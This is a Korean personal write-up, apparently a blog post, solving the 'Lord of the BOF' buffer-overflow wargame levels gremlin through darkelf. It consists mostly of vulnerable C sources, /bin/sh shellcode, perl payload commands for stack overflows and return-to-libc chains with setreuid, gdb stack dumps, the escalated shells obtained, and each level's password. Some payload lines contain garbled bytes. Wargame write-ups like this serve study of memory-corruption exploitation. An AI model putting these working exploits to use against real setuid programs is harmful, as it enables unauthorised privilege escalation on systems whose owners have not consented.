본문
따로 정리할 시간도 없고, 인터넷에 구글링하면 좋은 문서들이 너무너무 많은 관계로..........
그냥 문제 풀면서 끄적였던것들을 올리기로-_-;;....
BOF 원정대
======================== [Level 1] ========================
[gate@localhost gate]$ cat gremlin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- gremlin
- simple BOF
*/
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gate@localhost gate]$
============ Solve 1.
shellcode(53byte) : "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
53byte
0xbffff908
buf 256
sfb
ret
256-53 = 203
./gremlin "`perl -e '{print "\x90"x203,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh","\xDE\xED\xBE\xEF","\x38\xf9\xff\xbf"}'`"
[NOP][SHELLCODE][SFP][EIP]
1. gdb로 버퍼의 시작점을 찾는다.
2. payload를 구성해서 쏴준다.
3. clear!..
=========== Solve 2.
RTL로 풀면?.
0x400a9d48 <__execve>
0x4006604c <printf>
./gremlin "`perl -e '{print "/bin/sh","\x90"x200,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh","\x44\xf9\xff\xbf","\x48\x9d\x0a\x40","\x38\xf9\xff\xbf","\xc0\xf0\xff\xbf"}'`"
bash$ /bin/my-pass
euid = 501
hello bof world
bash$ whoami
gremlin
======================== [Level 2] ========================
[gremlin@localhost gremlin]$ cat cobolt.c
/*
The Lord of the BOF : The Fellowship of the BOF
- cobolt
- small buffer
*/
int main(int argc, char *argv[])
{
char buffer[16];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gremlin@localhost gremlin]$
쉽게 푸는 방법.
환경 변수에 Level1에서 사용했던 shellcode를 EGG로 등록한다.
getenv를 사용해서 주소를 알아낸다.
=================== GetEnv.c Source =============
#include <stdio.h>
int main(int argc, char *argv[])
{
char *addr;
addr = getenv(argv[1]);
printf("%s : %p\n", addr, addr);
return 0;
}
=================================================
[Ax16][EBP][EGG address]
export EGG="`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
./env EGG
./cobolt `perl -e '{print "A"x16,"DEAD","\x9c\xfe\xff\xbf"}'`
bash$ /bin/my-pass
euid = 502
hacking exposed
bash$ whoami
cobolt
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$
Return To LIBC로 풀수 있는 방법은?..
int execl( const char *path, const char *arg, ...);
0x400a9ec0 <execl>
0x40058ae0 <__libc_system>
0x400391e0 <exit>
0x400a9d48 <__execve>
일단 system으로 해보자.
./t "`perl -e '{print "A"x16,"DEAD","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x59\xff\xff\xbf"x2}'`"
./cobolt "`perl -e '{print "A"x16,"DEAD","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x4f\xff\xff\xbf"x2}'`"
==============================================
setuid + system 조합으로 해보자.
stack에 0x00000000이 나올 때 까지 ret sled로 이동한 뒤, setuid가 0x00000000을 인자로 가지도록 호출하고, system 함수를 호출하도록 한다.
system 함수의 인자는 수정할 수 없으므로, stack에 쌓여있는 값이 참조하는 부분의 값으로 link 파일을 생성한다.
PATH에 현재경로를 등록하고 프로그램을 실행시키면 된다.
./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x7a\x84\x04\x08"x5,"\x50\xa4\x0a\x40","\xe0\x8a\x05\x40"}'`"
그런데 문제가 있다. setuid가 안걸린 프로그램은 잘 동작하는데, setuid가 걸린 프로그램은 link파일을 찾을 수 없다는 에러 메시지가 뜬다.
아마 system 함수에 의해서 새로운 sh이 생성되면서 setuid가 걸린 id로 실행이 되나보다. 쩝.;
공부는 많이 됐으나, 결국엔 실패..-_-;
===============================================
흠..env로 얻은 주소랑 실제 주소랑 다른데...왜이러지?-_-;;...
==> 파일명과 argument의 길이가 달라서 stack의 모양이 조금씩 달라진다.쩝..-_-
==> 해결방법은 파일명을 같게 하고, 아규먼트도 똑같이 하면 같아지지 않을까?(아직 테스트는 안해봤다.)
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xef\xbe\xed\xde","AAAA","\x56\xff\xff\xbf"x2}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","AAAA","\x56\xff\xff\xbf"x2}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x56\xff\xff\xbf"x2}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x48\x9d\x0a\x40","\xe0\x91\x03\x04","\x36\xff\xff\xbf"x2}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xc3\x9e\x0a\x40","\xe0\x91\x03\x04","\x51\xff\xff\xbf"x5}'`"
"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\x48\x9d\x0a\x40","\x4d\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"}'`"
"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\x48\x9d\x0a\x40","\x51\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"x2}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xc3\x9e\x0a\x40","\x51\xff\xff\xbf"x1,"\xe8\x84\x04\x08"}'`"
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe3\x8a\x05\x40","\x51\xff\xff\xbf"x1,"\xe8\x84\x04\x08"}'`"
"`perl -e '{print "\x20\xfc\xff\xbf","A"x12,"\xf8\xf0\xff\xbf","\xe0\x8a\x05\x40","\x4d\xff\xff\xbf"x2,"\xe8\xfa\xff\xbf"}'`"
========= Return To LIBC ============
정상케이스. execl.
[main ebp][main ret]
\x55\x89\xe5\x83\xec\x10\x83\x7d\x08\x01\x7f\x17\x68\xd0\x84\x04\x08\xe8\x0a\xff\xff\xff\x83\xc4\x04\x6a
\xf4\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x83\x3d\xe8\x94\x04\x08
(gdb) x/100x $esp-0x20
0xbffffab0: 0x080484dc 0xbffffab8 0x41414141 0x41414141
0xbffffac0: 0x41414141 0x41414141 0xbffffaf8 0x41414141
0xbffffad0: 0x400aa450 0x40058ae0 0x40058ae0 0x40058ae0
0xbffffae0: 0x40058ae0 0x08048300 0x00000000 0x080483a1
0xbffffaf0: 0x08048430 0x00000002 0xbffffb14 0x080482e0
0xbffffb00: 0x080484ac 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc1a 0xbffffc23 0x00000000
0xbffffb20: 0xbffffc50 0xbffffc62 0xbffffc7a 0xbffffc99
0xbffffb30: 0xbffffcab 0xbffffccd 0xbffffcda 0xbffffe9d
0xbffffb40: 0xbffffebc 0xbffffec9 0xbffffee6 0xbffffefb
0xbffffb50: 0xbfffff1a 0xbfffff25 0xbfffff35 0xbfffff3d
0xbffffb60: 0xbfffff47 0xbfffff58 0xbfffff66 0xbfffff74
0xbffffb70: 0xbfffff85 0xbfffff90 0xbfffffa3 0xbfffffe8
0xbffffb80: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb90: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffba0: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffbb0: 0x00000000 0x00000009 0x08048380 0x0000000b
0xbffffbc0: 0x000001f5 0x0000000c 0x000001f5 0x0000000d
$1 = {int (char *, char *)} 0x400660a0 <sprintf>
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
$3 = {<text variable, no debug info>} 0x400aa450 <__setuid>
[gremlin@localhost gremlin]$ ./envvvv FMT
%2$n?@ : 0xbffffec0
[gremlin@localhost gremlin]$ ./envvvv SHELL
/bin/bash2 : 0xbfffff4d
./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x7a\x84\x04\x08"x5,"\x50\xa4\x0a\x40","\xe0\x8a\x05\x40"}'`"
./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x4d\xff\xff\xbf","\xd8\xfa\xff\xbf"}'`"
(gdb) x/100x $esp-0x20
0xbffffaa0: 0x080484dc 0xbffffaa8 0x41414141 0x41414141
0xbffffab0: 0x41414141 0x41414141 0xbffffaf8 0x42424242
0xbffffac0: 0x400aa450 0xbffffad8 0xbffffec0 0xbfffff4d
0xbffffad0: 0xbffffffc 0x08048300 0x00000000 0x080483a1
0xbffffae0: 0x08048430 0x00000002 0xbffffb04 0x080482e0
0xbffffaf0: 0x080484ac 0x4000ae60 0xbffffafc 0x40013e90
0xbffffb00: 0x00000002 0xbffffc0e 0xbffffc17 0x00000000
0xbffffb10: 0xbffffc44 0xbffffc56 0xbffffc6e 0xbffffc8d
0xbffffb20: 0xbffffcab 0xbffffccd 0xbffffcda 0xbffffe9d
0xbffffb30: 0xbffffebc 0xbffffec9 0xbffffee6 0xbffffefb
0xbffffb40: 0xbfffff1a 0xbfffff25 0xbfffff35 0xbfffff3d
[gremlin@localhost gremlin]$ ./envvvv MYSHELL
/tmp/myshell : 0xbffffc9e
[gremlin@localhost gremlin]$ ./envvvv FMT
%2$n?@ : 0xbffffec0
[gremlin@localhost gremlin]$
(gdb) x/100x $esp-0x20
0xbffffab0: 0x080484dc 0xbffffab8 0x41414141 0x41414141
0xbffffac0: 0x41414141 0x41414141 0xbffffaf8 0x42424242
0xbffffad0: 0x400aa450 0xbffffad8 0xbffffec0 0xbfffff4d
0xbffffae0: 0xbffffffc 0x08048300 0x00000000 0x080483a1
0xbffffaf0: 0x08048430 0x00000002 0xbffffb14 0x080482e0
0xbffffb00: 0x080484ac 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc17 0xbffffc20 0x00000000
0xbffffb20: 0xbffffc4d 0xbffffc5f 0xbffffc77 0xbffffc96
0xbffffb30: 0xbffffcab 0xbffffccd 0xbffffcda 0xbffffe9d
0xbffffb40: 0xbffffebc 0xbffffec9 0xbffffee6 0xbffffefb
0xbffffb50: 0xbfffff1a 0xbfffff25 0xbfffff35 0xbfffff3d
0xbffffb60: 0xbfffff47 0xbfffff58 0xbfffff66 0xbfffff74
0xbffffb70: 0xbfffff85 0xbfffff90 0xbfffffa3 0xbfffffe8
0xbffffb80: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb90: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffba0: 0x00001000 0x00000007 0x40000000 0x00000008
[gremlin@localhost gremlin]$ ./cobolt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x9e\xfc\xff\xbf","\xd8\xfa\xff\xbf"}'`"
AAAAAAAAAAAAAAAA表퓼`@P?
@喇오?퓹?왠??
bash$ id
uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)
bash$ ls
ls: .: Permission denied
bash$ /bin/my-pass
euid = 502
hacking exposed
bash$
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\x9e\xfc\xff\xbf"x2}'`"
[gremlin@localhost gremlin]$ export FMT="%2\$n%3\$n`printf "\xe0\x8a\x05\x40"`"
[gremlin@localhost gremlin]$
[gremlin@localhost gremlin]$
[gremlin@localhost gremlin]$
[gremlin@localhost gremlin]$ ./envvvv FMT
%2$n%3$n?@ : 0xbffffebc
[gremlin@localhost gremlin]$ ./envvvv SHELL
/bin/bash2 : 0xbfffff4d
[gremlin@localhost gremlin]$
[gremlin@localhost gremlin]$ ./tttttt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","AAAA","\x50\xa4\x0a\x40","\xd4\xfa\xff\xbf","\xc0\xfe\xff\xbf","\x4d\xff\xff\xbf","\xd8\xfa\xff\xbf"x2}'`"
AAAAAAAAAAAAAAAA表풞AAAP?
@喇오?풫왠?왠??
Segmentation fault (core dumped)
[gremlin@localhost gremlin]$ gdb ./tttttt core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./tttttt AAAAAAAAAAAAAAAA表풞AAAP?
@喇오?풫왠?왠??.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x41414141 in ?? ()
(gdb) x/100x %esp-0x20
A parse error in expression, near `esp-0x20'.
(gdb) x/100x $esp-0x20
0xbffffaa0: 0x080484dc 0xbffffaa8 0x41414141 0x41414141
0xbffffab0: 0x41414141 0x41414141 0xbffffaf8 0x41414141
0xbffffac0: 0x400aa450 0xbffffad4 0xbffffec0 0xbfffff4d
0xbffffad0: 0xbffffad8 0xbffffad8 0x00000000 0x080483a1
0xbffffae0: 0x08048430 0x00000002 0xbffffb04 0x080482e0
0xbffffaf0: 0x080484ac 0x4000ae60 0xbffffafc 0x40013e90
0xbffffb00: 0x00000002 0xbffffc0f 0xbffffc18 0x00000000
0xbffffb10: 0xbffffc49 0xbffffc5b 0xbffffc73 0xbffffc92
0xbffffb20: 0xbffffca7 0xbffffcc9 0xbffffcd6 0xbffffe99
0xbffffb30: 0xbffffeb8 0xbffffec9 0xbffffee6 0xbffffefb
0xbffffb40: 0xbfffff1a 0xbfffff25 0xbfffff35 0xbfffff3d
0xbffffb50: 0xbfffff47 0xbfffff58 0xbfffff66 0xbfffff74
0xbffffb60: 0xbfffff85 0xbfffff90 0xbfffffa3 0xbfffffe8
0xbffffb70: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb80: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffb90: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffba0: 0x00000000 0x00000009 0x08048380 0x0000000b
0xbffffbb0: 0x000001f5 0x0000000c 0x000001f5 0x0000000d
0xbffffbc0: 0x000001f5 0x0000000e 0x000001f5 0x00000010
0xbffffbd0: 0x0fabfbff 0x0000000f 0xbffffc0a 0x00000000
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\xa0\x60\x06\x40","\x50\xa4\x0a\x40","\xc4\xfa\xff\xbf","\xbc\xfe\xff\xbf","\x4d\xff\xff\xbf","\xc8\xfa\xff\xbf","\xcc\xfa\xff\xbf"}'`"
=====
$1 = {int (char *)} 0x4006604c <printf>
0x400a9ec0 <execl>
[gremlin@localhost gremlin]$ ./envvvv FMT
%3$n : 0xbffffec4
[gremlin@localhost gremlin]$ ./envvvv SHELL
/bin/bash2 : 0xbfffff4d
[gremlin@localhost gremlin]$
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\xc0\x9e\x0a\x40","\xc4\xfe\xff\xbf","\x4d\xff\xff\xbf","\x4d\xff\xff\xbf","\xe0\xfa\xff\xbf"}'`"
흠..여러가지 삽질 결과...
setuid 로는 uid가 바뀌지 않는다.
(gdb) x/100x $esp-0x20
0xbffffab0: 0x080484dc 0xbffffab8 0x41414141 0x41414141
0xbffffac0: 0x41414141 0x41414141 0xbffffaf8 0x41414141
0xbffffad0: 0x400a9ec0 0xbffffec4 0xbfffff4d 0xbfffff4d
0xbffffae0: 0xbffffacc 0x08048300 0x00000000 0x080483a1
0xbffffaf0: 0x08048430 0x00000002 0xbffffb14 0x080482e0
0xbffffb00: 0x080484ac 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc1b 0xbffffc24 0x00000000
0xbffffb20: 0xbffffc51 0xbffffc63 0xbffffc7b 0xbffffc9a
0xbffffb30: 0xbffffcaf 0xbffffcd1 0xbffffcde 0xbffffea1
0xbffffb40: 0xbffffec0 0xbffffec9 0xbffffee6 0xbffffefb
0xbffffb50: 0xbfffff1a 0xbfffff25 0xbfffff35 0xbfffff3d
0xbffffb60: 0xbfffff47 0xbfffff58 0xbfffff66 0xbfffff74
0xbffffb70: 0xbfffff85 0xbfffff90 0xbfffffa3 0xbfffffe8
0xbffffb80: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb90: 0x00000020 0x00000005 0x00000006 0x00000006
흠.............
몇가지 삽질 결과.
일단, root 권한으로 setuid가 걸린놈이랑 일반 유저랑은 좀 다르게 동작한다.
setuid를 할 때 정확한 id 값을 넣어주어야 한다.
setuid로는 안되고, setreuid를 실행해야한다.
setreuid가 동작하면, system 함수로도 된다.
setreuid가 없으면, system, execl 둘다 안된다.
euid는 setreuid에 의해서만 변한다?....
아..모든게 명확한게 없네..ㅡㅡ;;
$1 = {<text variable, no debug info>} 0x400c4e20 <__setreuid>
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
[BUF][SFP][printf][pop-ret][FMT(%3$n%4$n)][setreuid][pop-pop-ret][selfaddr][selfaddr][system][AAAA][/bin/sh]
0x0005b5f1 madd al, ch ; pop ebp ; ret ; (1 found)
[gremlin@localhost gremlin]$ ./envvvv FMT
%3$n%4$n : 0xbffffe8c
[gremlin@localhost gremlin]$ ./envvvv SHELL
/bin/bash2 : 0xbfffff3c
(gdb) x/100x $esp-0x20
0xbffffa60: 0x080484dc 0xbffffa68 0x41414141 0x41414141
0xbffffa70: 0x41414141 0x41414141 0xbffffaf8 0x42424242
0xbffffa80: 0x400cc104 0xbffffec4 0x400c4e20 0x400cc103
0xbffffa90: 0xbffffae0 0xbffffae0 0x40058ae0 0x41414141
0xbffffaa0: 0xbfffff19 0x00000000 0xbffffac4 0x080482e0
0xbffffab0: 0x080484ac 0x4000ae60 0xbffffabc 0x40013e90
0xbffffac0: 0x00000002 0xbffffbd3 0xbffffbdc 0x00000000
0xbffffad0: 0xbffffc19 0xbffffc2b 0xbffffc43 0xbffffc62
0xbffffae0: 0xbffffc77 0xbffffc99 0xbffffca6 0xbffffe69
0xbffffaf0: 0xbffffe88 0xbffffe95 0xbffffeb2 0xbffffec7
0xbffffb00: 0xbffffeea 0xbfffff09 0xbfffff14 0xbfffff24
0xbffffb10: 0xbfffff2c 0xbfffff36 0xbfffff47 0xbfffff55
0xbffffb20: 0xbfffff63 0xbfffff74 0xbfffff7f 0xbfffff92
0xbffffb30: 0xbfffffa3 0xbfffffe8 0x00000000 0x00000003
0xbffffb40: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb50: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb60: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb70: 0x08048380 0x0000000b 0x000001f5 0x0000000c
0xbffffb80: 0x000001f5 0x0000000d 0x000001f5 0x0000000e
0xbffffb90: 0x000001f5 0x00000010 0x0fabfbff 0x0000000f
0xbffffba0: 0xbffffbce 0x00000000 0x00000000 0x00000000
0xbffffbb0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc0: 0x00000000 0x00000000 0x00000000 0x36690000
[gremlin@localhost gremlin]$ ./envvvv FMT
%502d%3$n%4$n : 0xbffffe87
[gremlin@localhost gremlin]$ ./envvvv SHELL
/bin/bash2 : 0xbfffff3c
pop-ret : 0x400cc104
pop-pop-ret : 0x400cc103
[BUF] [SFP] [printf] [pop-ret] [FMT(%3$n%4$n)] [setreuid] [pop-pop-ret] [selfaddr] [selfaddr] [system] [AAAA] [/bin/sh]
"`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\x87\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\x90\xfa\xff\xbf","\x94\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x3c\xff\xff\xbf"}'`"
[gremlin@localhost gremlin]$ ./cobolt "`perl -e '{print "A"x16,"\xf8\xfa\xff\xbf","\x4c\x60\x06\x40","\x04\xc1\x0c\x40","\x87\xfe\xff\xbf","\x20\x4e\x0c\x40","\x03\xc1\x0c\x40","\x90\xfa\xff\xbf","\x94\xfa\xff\xbf", "\xe0\x8a\x05\x40", "AAAA", "\x3c\xff\xff\xbf"}'`"
AAAAAAAAAAAAAAAA表풪`@?@뉮?N
@?@멁퓭?욈?@AAAA<?
bash2-2.03$ id
uid=502(cobolt) gid=501(gremlin) groups=501(gremlin)
bash2-2.03$ /bin/my-pass
euid = 502
hacking exposed
bash2-2.03$
cobolt
=====================================================================================
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
[cobolt@localhost cobolt]$
[cobolt@localhost cobVlt]$ ./envvvv EGG
1?方??^?핂F덯 N?1???汪/bin/sh : 0xbffffe9b
[cobolt@localhost cobolt]$ (perl -e '{print "A"x16, "B"x4, "\x9b\xfe\xff\xbf"}';cat) | ./goblin
id
AAAAAAAAAAAAAAAABBBBd
id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
/bin/my-pass
euid = 503
hackers proof
id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
whoami
goblin
====================================================================================
[goblin@localhost goblin]$ cat orc.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[goblin@localhost goblin]$
0x80485d7 <main+215>: ret
./ttt "`perl -e '{print "A"x40,"BBBB","\xbf\xff\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
[goblin@localhost goblin]$ ./orc "`perl -e '{print "A"x40,"BBBB","\xdV\xfa\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB幾??方??^?핂F덯 N?1???汪/bin/sh
bash$ id ?됹
uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin)
bash$ /bin/my-pass
euid = 504
cantata
bash$ whoami
orc
bash$
========================================================================
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
[orc@localhost orc]$
cp wolfman ttttttt
[orc@localhost orc]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","AAA\xVf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAAA??方??^?핂F덯 N?1???汪/bin/sh
Segmentation fault (core dumped) ?됹
[orc@localhost orc]$ gdb ./ttttttt core
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x38366900
0xbffffbe0: 0x2f2e0036 0x74747474 0x00747474 0x41414141
0xbffffbf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc10: 0x41414141 0x42424242 0xbf414141 0xdb31c031
0xbffffc20: 0x80cd17b0 0x895e1feb 0xc0310876 0x89074688
0xbffffc30: 0x0bb00c46 0x4e8df389 0x0c568d08 0xdb3180cd
0xbffffc40: 0xcd40d889 0xffdce880 0x622fffff 0x732f6e69
0xbffffc50: 0x00000068 0x00000000 0x00000000 0x00000000
0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000
"`perl -e '{print "A"x40,"BBBB","\x1c\xfc\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
[orc@localhost orc]$ ./wolfman "`perl -e '{print "A"x40,"BBBB","\x1cVxfc\xff\xbf","\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB???方??^?핂F덯 N?1???汪/bin/sh
bash$ id ?됹
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ /bin/my-pass
euid = 505
love eyuna
bash$ whoami
wolfman
bash$
====================================================================================
[wolfman@localhost wolfman]$ cat darkelf.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkelf
- egghunter + buffer hunter + check length of argv[1]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
[wolfman@localhost wolfman]$
흠..두번째 아규먼트로 쉘코드를 넘기면 되네-_-;
"`perl -e '{print "A"x40,"BBBB","AAA\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
4141
(gdb)
0xbffffc30: 0x42424241 0x41414142 0xc03100bf 0x17b0db31
0xbffffc40: 0x1feb80cd 0x0876895e 0x4688c031 0x0c468907
